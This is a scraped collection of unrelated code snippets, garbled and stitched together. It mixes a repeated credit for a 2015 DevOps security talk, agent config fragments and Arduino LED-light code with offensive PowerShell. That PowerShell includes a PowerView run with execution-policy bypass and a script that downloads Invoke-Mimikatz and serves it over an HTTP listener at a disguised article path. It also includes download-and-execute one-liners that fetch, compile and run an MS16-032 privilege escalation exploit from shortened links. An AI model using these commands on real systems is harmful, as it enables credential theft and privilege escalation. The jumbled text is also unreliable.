##"DevOops & How I Hacked You"##
Ken Johnson @cktricky
Chris Gates @carnal0wnage
Devops Days Washington DC 12 June 2015
# Increase log verbosity | |
log_level = "DEBUG" | |
# Setup data dir | |
data_dir = "/tmp/client1" | |
# Give the agent a unique name. Defaults to hostname | |
name = "client1" | |
# Enable the client |
# Increase log verbosity | |
log_level = "DEBUG" | |
# Setup data dir | |
data_dir = "/tmp/server1" | |
# Enable the server | |
server { | |
enabled = true |
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}" |
##"DevOops & How I Hacked You"##
Ken Johnson @cktricky
Chris Gates @carnal0wnage
Devops Days Washington DC 12 June 2015
#include "FastLED.h" | |
#define NUM_LEDS 100 | |
#define COLOR_ORDER RGB | |
CRGB leds[NUM_LEDS]; | |
//I have a few additional integers in here from different tests. | |
int y = 1; | |
int z = 0; | |
int w = 5; | |
int i = 20; |
https://www.doityourselfchristmas.com/wiki/index.php?title=Pixel_Wiring_Colors#WS2811 | |
#best arduino code for making the WriteWord magic happen | |
https://www.woodlandmanufacturing.com/articles/news/how-to-make-a-stranger-things-alphabet-sign-with-lights-code/ | |
https://github.com/djhazee/strangerlights/blob/master/strangerlights.py | |
https://imgur.com/gallery/RCJyA | |
https://www.instructables.com/id/Arduino-Based-Stranger-Things-Lights/ |
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
import torrequest | |
import stem.connection | |
from stem.connection import connect | |
from torrequest import TorRequest | |
# Choose a proxy port, a control port, and a password. | |
# Defaults are 9050, 9051, and None respectively. | |
# If there is already a Tor process listening the specified |
#include "FastLED.h" | |
#define NUM_LEDS 50 | |
CRGB leds[NUM_LEDS]; | |
static byte initialHue = 0; | |
byte changeInHue = 255 / NUM_LEDS; | |
void setup() { FastLED.addLeds<WS2811, 6>(leds, NUM_LEDS); } | |
void loop() { | |
//leds[0] = CRGB::Green; FastLED.show(); delay(300); |
Powershell: | |
powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032" | |
C# 64bit: | |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe | |
C# 32bit: | |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X32.exe" /platform:x32 "%te |